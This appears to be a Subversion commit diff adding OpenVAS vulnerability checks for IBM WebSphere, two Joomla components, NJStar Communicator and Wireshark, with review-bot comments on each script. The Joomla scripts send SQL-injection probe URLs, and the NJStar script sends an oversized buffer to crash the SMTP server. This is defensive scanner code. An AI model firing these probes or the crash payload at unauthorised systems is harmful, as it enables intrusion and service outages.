+  Fix: Apply the latest Fix Pack (8.0.0.1 or later) or APAR PM45992
+  http://www-01.ibm.com/support/docview.wss?uid=swg21474220
+
+  References:
+  http://xforce.iss.net/xforce/xfdb/70168
+  http://www-01.ibm.com/support/docview.wss?uid=swg1PM45992
+  http://www-01.ibm.com/support/docview.wss?uid=swg24030916 ";
+
+  script_description(desc);
+  script_summary("Check for the version of IBM WebSphere Application Server");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Web Servers");
+  script_dependencies("gb_ibm_websphere_detect.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!get_port_state(port)){
+  exit(0);
+}
+
+## Get Version from KB
+vers = get_kb_item(string("www/", port, "/websphere_application_server"));
+if(isnull(vers)){
+  exit(0);
+}
+
+## Check for IBM WebSphere Application Server versions
+if(version_is_equal(version: vers, test_version: "8.0.0.0")){
+  security_warning(port:port);
+}
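Review bot: The check `version_is_equal(version: vers, test_version: "8.0.0.0")` only matches if the detection script stores the version with all four components; should `gb_ibm_websphere_detect.nasl` ever record `8.0` (the form a short banner would yield), a vulnerable 8.0.0.0 install is reported clean. Given the description's `8.x before 8.0.0.1`, the range form used by the sibling scripts in this commit is the safer expression: `if(version_in_range(version: vers, test_version: "8.0", test_version2: "8.0.0.0")){`. The detection script is not visible here, so this is a hedge on its output format rather than a confirmed miss.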


Property changes on: trunk/openvas-plugins/scripts/gb_ibm_was_jsf_info_disclosure_vuln.nasl
___________________________________________________________________
Name: svn:executable
   + *

Added: trunk/openvas-plugins/scripts/gb_joomla_barter_sites_category_id_param_sql_inj_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_joomla_barter_sites_category_id_param_sql_inj_vuln.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_joomla_barter_sites_category_id_param_sql_inj_vuln.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,105 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_joomla_barter_sites_category_id_param_sql_inj_vuln.nasl 18227 2011-11-04 12:12:12 nov $
+#
+# Joomla! Barter Sites 'com_listing' Component 'category_id' Parameter SQL Injection Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802268);
+  script_version("$Revision: $");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-04 12:12:12 +0530 (Fri, 04 Nov 2011)");
+  script_bugtraq_id(50021);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_name("Joomla! Barter Sites 'com_listing' Component 'category_id' Parameter SQL Injection Vulnerability");
+  desc = "
+  Overview: This host is running Joomla! Barter Sites component and is prone to
+  SQL injection vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused by improper validation of user-supplied input via the
+  'category_id' parameter to index.php (when 'option' is set to 'com_listing'
+  and 'task' is set to 'browse'), which allows attacker to manipulate SQL
+  queries by injecting arbitrary SQL code.
+
+  Impact:
+  Successful exploitation will let attackers to cause SQL Injection attack and
+  gain sensitive information.
+
+  Impact Level: Application.
+
+  Affected Software/OS:
+  Joomla! Barter Sites Component Version 1.3
+
+  Fix: No solution or patch is available as on 4th November 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.barter-sites.com
+
+  References:
+  http://osvdb.org/show/osvdb/76270
+  http://secunia.com/advisories/46368
+  http://www.exploit-db.com/exploits/18046
+  http://packetstormsecurity.org/files/105626/joomlabarter-sqlxss.txt ";
+
+  script_description(desc);
+  script_summary("Check if Joomla! Barter Sites component is vulnerable to SQL Injection");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Web application abuses");
+  script_dependencies("joomla_detect.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)){
+  exit(0);
+}
+
+## Get Joomla Directory
+if(!dir = get_dir_from_kb(port:port,app:"joomla")) {
+  exit(0);
+}
+
+## Construct the Attack Request
+url = dir + "/index.php?option=com_listing&task=browse&category_id=1'";
+
+## Try attack and check the response to confirm vulnerability
+if(http_vuln_check(port:port, url:url, check_header: TRUE,
+                   pattern:"Invalid argument supplied for foreach\(\)",
+                   extra_check:">Warning<")){
+  security_hole(port);
+}
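Review bot: The match in the http_vuln_check call (pattern "Invalid argument supplied for foreach\(\)" with extra_check ">Warning<") is a generic PHP runtime warning rather than a database error, so any page that emits that warning for an unrelated reason reports the host as vulnerable. Consider tightening extra_check to a string specific to the com_listing output, or requesting the same URL with a well-formed category_id first and reporting only when the warning appears solely for the malformed value. The same pattern pair is used in gb_joomla_techfolio_comp_catid_param_sql_inj_vuln.nasl in the next hunk. Separately, `security_hole(port)` passes the port positionally while the other scripts in this commit use the named form; `security_hole(port:port);` would match them.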

Added: trunk/openvas-plugins/scripts/gb_joomla_techfolio_comp_catid_param_sql_inj_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_joomla_techfolio_comp_catid_param_sql_inj_vuln.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_joomla_techfolio_comp_catid_param_sql_inj_vuln.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,104 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_joomla_techfolio_comp_catid_param_sql_inj_vuln.nasl 18227 2011-11-04 11:11:11 nov $
+#
+# Joomla! Techfolio Component 'catid' Parameter SQL Injection Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802267);
+  script_version("$Revision: $");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-04 12:12:12 +0530 (Fri, 04 Nov 2011)");
+  script_bugtraq_id(50422);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_name("Joomla! Techfolio Component 'catid' Parameter SQL Injection Vulnerability");
+  desc = "
+  Overview: This host is running Joomla! Techfolio component and is prone to
+  SQL injection vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused by improper validation of user-supplied input via the
+  'catid' parameter to index.php (when 'option' is set to 'com_techfolio'
+  and 'view' is set to 'techfoliodetail'), which allows attacker to manipulate
+  SQL queries by injecting arbitrary SQL code.
+
+  Impact:
+  Successful exploitation will let attackers to cause SQL Injection attack and
+  gain sensitive information.
+
+  Impact Level: Application.
+
+  Affected Software/OS:
+  Joomla! Techfolio Component Version 1.0
+
+  Fix: No solution or patch is available as on 4th November 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.techdeluge.com/joomla-component/com_techfolio.zip
+
+  References:
+  http://xforce.iss.net/xforce/xfdb/71029
+  http://www.exploit-db.com/exploits/18042/
+  http://packetstormsecurity.org/files/106353/joomlatechfolio-sql.txt ";
+
+  script_description(desc);
+  script_summary("Check if Joomla! Techfolio component is vulnerable to SQL Injection");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Web application abuses");
+  script_dependencies("joomla_detect.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)){
+  exit(0);
+}
+
+## Get Joomla Directory
+if(!dir = get_dir_from_kb(port:port,app:"joomla")) {
+  exit(0);
+}
+
+## Construct the Attack Request
+url = dir + "/index.php?option=com_techfolio&view=techfoliodetail&catid=1'";
+
+## Try attack and check the response to confirm vulnerability
+if(http_vuln_check(port:port, url:url, check_header: TRUE,
+                   pattern:"Invalid argument supplied for foreach\(\)",
+                   extra_check:">Warning<")){
+  security_hole(port);
+}

Added: trunk/openvas-plugins/scripts/gb_njstar_communicator_minismtp_server_bof_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_njstar_communicator_minismtp_server_bof_vuln.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_njstar_communicator_minismtp_server_bof_vuln.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,121 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_njstar_communicator_minismtp_server_bof_vuln.nasl 18302 2011-11-03 11:11:11Z nov $
+#
+# NJStar Communicator MiniSMTP Server Remote Stack Buffer Overflow Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802266);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2011-4040");
+  script_bugtraq_id(50452);
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-08 19:46:14 +0530 (Tue, 08 Nov 2011)");
+  script_name("NJStar Communicator MiniSMTP Server Remote Stack Buffer Overflow Vulnerability");
+  desc = "
+  Overview: The host is running NJStar Communicator MiniSMTP Server and is
+  prone to buffer overflow vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to a boundary error within the MiniSmtp server when
+  processing packets. This can be exploited to cause a stack-based buffer
+  overflow via a specially crafted packet sent to TCP port 25.
+
+  Impact:
+  Successful exploitation may allow remote attackers to execute arbitrary code
+  within the context of the application or cause a denial of service condition.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  NJStar Communicator Version 3.00
+
+  Fix: No solution or patch is available as on 3rd November, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.njstar.com/cms/download
+
+  References:
+  http://osvdb.org/show/osvdb/76728
+  http://secunia.com/advisories/46630
+  http://www.exploit-db.com/exploits/18057";
+
+  script_description(desc);
+  script_summary("Determine NJStar Communicator MiniSMTP Server Buffer Overflow Vulnerability");
+  script_category(ACT_DENIAL);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Buffer overflow");
+  script_dependencies("find_service.nes", "smtpserver_detect.nasl");
+  script_require_ports("Services/smtp", 25);
+  exit(0);
+}
+
+
+include("smtp_func.inc");
+
+## Get SMTP Port
+port = get_kb_item("Services/smtp");
+if(!port) {
+  port = 25;
+}
+
+if(get_kb_item('SMTP/'+port+'/broken')) {
+  exit(0);
+}
+
+## Check Port State
+if(!get_port_state(port)) {
+  exit(0);
+}
+
+## Open SMTP Socket
+if(!soc = smtp_open(port:port)) {
+  exit(0);
+}
+
+## Get Banner
+res = recv(socket:soc, length:512);
+
+## Confirm Application
+send(socket:soc, data:'HELP\r\n');
+res = recv(socket:soc, length:1024);
+if("E-mail Server From NJStar Software" >!< res)
+{
+  smtp_close(socket:soc);
+  exit(0);
+
+}
+
+## Sending Exploit
+send(socket:soc, data:crap(512));
+smtp_close(socket:soc);
+
+## Open the socket and Check server is dead or alive
+if(!soc = smtp_open(port:port))
+{
+  security_hole(port);
+  exit(0);
+}
+smtp_close(socket:soc);
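Review bot: The liveness check after the exploit send (the second smtp_open at the end of the hunk) treats any failed reconnect as a crash, so a transient connection failure or a server that throttles connections is reported as vulnerable without the service having died. A short delay and a few retries before calling security_hole() would make the result more reliable; a sketch is below. The banner read into `res` right after the first smtp_open is overwritten by the HELP response without being used, so a comment such as `## Drain the greeting banner before sending commands` would explain it, and the stray blank line before the closing brace of the application check can be dropped.
```nasl
## … unchanged: banner read, HELP check, exploit send, smtp_close …

## Retry the reconnect a few times so a transient failure is not reported as a crash
alive = FALSE;
for(i = 0; i < 3; i++)
{
  sleep(1);
  if(soc = smtp_open(port:port))
  {
    alive = TRUE;
    smtp_close(socket:soc);
    break;
  }
}
if(!alive)
{
  security_hole(port);
}
```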

Added: trunk/openvas-plugins/scripts/gb_wireshark_bof_n_dos_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_wireshark_bof_n_dos_vuln_win.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_wireshark_bof_n_dos_vuln_win.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,92 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_wireshark_bof_n_dos_vuln_win.nasl 18418 2011-11-08 11:40:17 nov $
+#
+# Wireshark Heap Based BOF and Denial of Service Vulnerabilities (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802502);
+  script_version("$Revision: $");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-08 11:40:17 +0200 (Tue, 08 Nov 2011)");
+  script_cve_id("CVE-2011-4102", "CVE-2011-4101");
+  script_bugtraq_id(50486, 50481);
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Wireshark Heap Based BOF and Denial of Service Vulnerabilities (Windows)");
+  desc = "
+  Overview: The host is installed with Wireshark and is prone to heap based
+  buffer overflow and denial of service vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are caused due to,
+  - An error while parsing ERF file format. This could cause wireshark to crash
+    by reading a malformed packet trace file.
+  - An error in dissect_infiniband_common function in
+    epan/dissectors/packet-infiniband.c in the Infiniband dissector, could
+    dereference a NULL pointer.
+
+  Impact:
+  Successful exploitation could allow attackers to cause a denial of service via
+  via a malformed packet.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Wireshark version 1.4.0 through 1.4.9 and 1.6.x before 1.6.3
+
+  Fix: Upgrade to the Wireshark version 1.6.3 or later,
+  For updates refer, http://www.wireshark.org/download.html
+
+  References:
+  https://bugzilla.redhat.com/show_bug.cgi?id=750645
+  http://openwall.com/lists/oss-security/2011/11/01/9
+  https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6476
+  http://anonsvn.wireshark.org/viewvc?view=revision&revision=39508
+  http://anonsvn.wireshark.org/viewvc?view=revision&revision=39500 ";
+
+  script_description(desc);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_summary("Check the version of Wireshark");
+  script_category(ACT_GATHER_INFO);
+  script_family("General");
+  script_dependencies("gb_wireshark_detect_win.nasl");
+  script_require_keys("Wireshark/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+wiresharkVer = get_kb_item("Wireshark/Win/Ver");
+if(!wiresharkVer){
+  exit(0);
+}
+
+## Check for Wireshark Version
+if(version_in_range(version:wiresharkVer, test_version:"1.4.0", test_version2:"1.4.9")||
+   version_in_range(version:wiresharkVer, test_version:"1.6.0", test_version2:"1.6.2")){
+  security_warning(0);
+}
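Review bot: The Impact paragraph in desc repeats "via" across the line break ("denial of service via / via a malformed packet"); the same duplicated word appears in gb_wireshark_csn1_dissector_dos_vuln_win.nasl in the next hunk. The Fix text names only 1.6.3 although the affected range includes 1.4.0 through 1.4.9, so a user on the 1.4 branch gets no applicable upgrade target from the report; if a fixed 1.4 release exists (presumably the one published alongside 1.6.3), name it there. `security_warning(0)` passes a bare 0 where the network checks in this commit pass `port:port`; since this is a registry-based local check, a comment such as `## Local install check, no network port` would make the 0 self-explanatory.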


Property changes on: trunk/openvas-plugins/scripts/gb_wireshark_bof_n_dos_vuln_win.nasl
___________________________________________________________________
Name: svn:executable
   + *

Added: trunk/openvas-plugins/scripts/gb_wireshark_csn1_dissector_dos_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_wireshark_csn1_dissector_dos_vuln_win.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_wireshark_csn1_dissector_dos_vuln_win.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,88 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_wireshark_csn1_dissector_dos_vuln_win.nasl 18418 2011-11-08 11:55:17 nov $
+#
+# Wireshark CSN.1 Dissector Denial of Service Vulnerability (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802503);
+  script_version("$Revision: $");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-08 11:55:17 +0200 (Tue, 08 Nov 2011)");
+  script_cve_id("CVE-2011-4100");
+  script_bugtraq_id(50479);
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Wireshark CSN.1 Dissector Denial of Service Vulnerability (Windows)");
+  desc = "
+  Overview: The host is installed with Wireshark and is prone to denial of
+  service vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to an error in csnStreamDissector function in
+  epan/dissectors/packet-csn1.c in the CSN.1 dissector, which fails to
+  initialize a certain variable.
+
+  Impact:
+  Successful exploitation could allow attackers to cause a denial of service via
+  via a malformed packet.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Wireshark version 1.6.x before 1.6.3
+
+  Fix: Upgrade to the Wireshark version 1.6.3 or later,
+  For updates refer, http://www.wireshark.org/download.html
+
+  References:
+  https://bugzilla.redhat.com/show_bug.cgi?id=750643
+  http://openwall.com/lists/oss-security/2011/11/01/9
+  http://www.wireshark.org/security/wnpa-sec-2011-17.html
+  https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6351
+  http://anonsvn.wireshark.org/viewvc?view=revision&revision=39140 ";
+
+  script_description(desc);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_summary("Check the version of Wireshark");
+  script_category(ACT_GATHER_INFO);
+  script_family("Denial of Service");
+  script_dependencies("gb_wireshark_detect_win.nasl");
+  script_require_keys("Wireshark/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+wiresharkVer = get_kb_item("Wireshark/Win/Ver");
+if(!wiresharkVer){
+  exit(0);
+}
+
+## Check for Wireshark Version
+if(version_in_range(version:wiresharkVer, test_version:"1.6.0", test_version2:"1.6.2")){
+  security_warning(0);
+}
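Review bot: script_family is "Denial of Service" here while the near-identical Wireshark check in the previous hunk (gb_wireshark_bof_n_dos_vuln_win.nasl) uses "General", so two reports for the same product and the same kind of flaw land in different families in the results. Both should use the same value; "Denial of Service" appears to be the more specific choice for the pair.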


Property changes on: trunk/openvas-plugins/scripts/gb_wireshark_csn1_dissector_dos_vuln_win.nasl
___________________________________________________________________
Name: svn:executable
   + *


